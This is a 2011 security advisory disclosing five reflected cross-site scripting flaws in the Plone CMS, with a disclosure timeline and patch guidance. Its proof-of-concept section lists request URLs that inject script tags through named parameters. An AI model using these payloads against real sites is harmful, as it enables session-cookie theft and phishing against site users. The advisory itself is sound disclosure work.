Multiple cross-site scripting vulnerabilities in Plone

SEC Consult Vulnerability Lab Security Advisory < 20110606-0 >

=======================================================================

title: Multiple cross-site scripting vulnerabilities

product: Plone

vulnerable version: 4.0.6.1/4.1rc3 and earlier versions (Plone 3 & 2.5)

fixed version: Hotfix 20110531

impact: medium

homepage: plone.org

found: 2011-03-23

CVE: CVE-2011-1948

by: S. Streichsbier / SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

Plone is an open source Content Management System (CMS) built on top of Zope

and CMF.

 

"A powerful, flexible Content Management Solution that is easy to install, use

and extend.

Plone lets non-technical people create and maintain information for a public

website or an intranet using only a web browser. Plone is easy to understand

and use - allowing users to be productive in just half an hour - yet offers a

wealth of community-developed add-ons and extensibility to keep meeting your

needs for years to come.

 

Blending the creativity and speed of open source with a technologically

advanced Python back-end, Plone offers superior security without sacrificing

power or extensibility."

 

source: plone.org/about/

 

 

 

Vulnerability overview/description:

-----------------------------------

Plone uses skin layers for extending Plone themes. The "portal_skins" tool

allows managing skin layers, which may be DTML methods, images, Python

scripts, etc. Several skin layers provided in the default installation of the

tested Plone version include Python scripts, which suffer from cross-site

scripting vulnerabilities due to insufficient validation of user supplied

data.

 

An unauthenticated user is able to perform cross-site scripting attacks e.g.

create relogin trojan horses or steal session cookies in the context of the

affected website that uses a vulnerable Plone version.

 

 

 

Proof of concept:

-----------------

1) The parameter "input_list" of the createMultiColumnList.py file included in

the plone_scripts package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/createMultiColumnList?input_list=%3Cscript%3Ealert(1)%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E

 

 

2) The parameter "randomstring" of the pwreset_constructURL.py file included

in the PasswordReset package is not properly validated and is prone to

reflected cross-site scripting.

 

http:// $host/Plone/pwreset_constructURL?randomstring=%3Cscript%3Ealert(1)%3C/script%3E

 

 

3) The parameter "qs" of the create_query_string.py file included in the

plone_scripts package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/create_query_string?qs=%3Cscript%3Ealert(1)%3C/script%3E

 

 

4) The parameter "default_tab" of the selectedTabs.py file included in the

plone_deprecated package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/selectedTabs?default_tab=%3Cscript%3Ealert(1)%3C/script%3E

 

 

5) The parameter "input_id" of the getPopupScript.py file included in the

plone_scripts package is not properly validated and is prone to reflected

cross-site scripting.

 

http:// $host/Plone/getPopupScript?input_id=%3Cscript%3Ealert(1)%3C/script%3E

 

 

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerability is verified to exist in 4.0.4 version of Plone, which

was the most recent version at the time of discovery.

 

The following newer versions are vulnerable too:

* v4.0.5

* v4.0.6 and v4.0.6.1

* v4.1rc3

 

 

SEC Consult did not test earlier versions, but the vendor states that

Plone 3 and 2.5 are also affected.

 

 

Fixed version:

--------------

* 4.0.7 and above

 

 

Vendor contact timeline:

------------------------

2011-03-28: Contacting vendor through security@plone.org

2011-03-29: Vendor: reply, sending advisory draft

2011-03-30: Vendor: questions regarding issue

2011-03-30: Describing attack vectors

2011-04-11: Asking for status update & reply from vendor

2011-04-21: No exact fixing date, hotfix is available but testing needed

2011-06-02: Vendor informs SEC Consult of hotfix release

2011-06-06: SEC Consult publishes advisory

 

 

Solution:

---------

Upgrade to version 4.0.7 or install the following hotfix for older releases:

plone.org/products/plone-hotfix/releases/20110531

 

 

 

Workaround:

-----------

Affected skin layers can be disabled through the web in portal_skins ->

properties

 

 

 

Advisory URL:

-------------

www.sec-consult.com/en/advisories.html

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Mooslackengasse 17

A-1190 Vienna

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com

www.sec-consult.com

 

EOF S. Streichsbier, J. Greil / @2011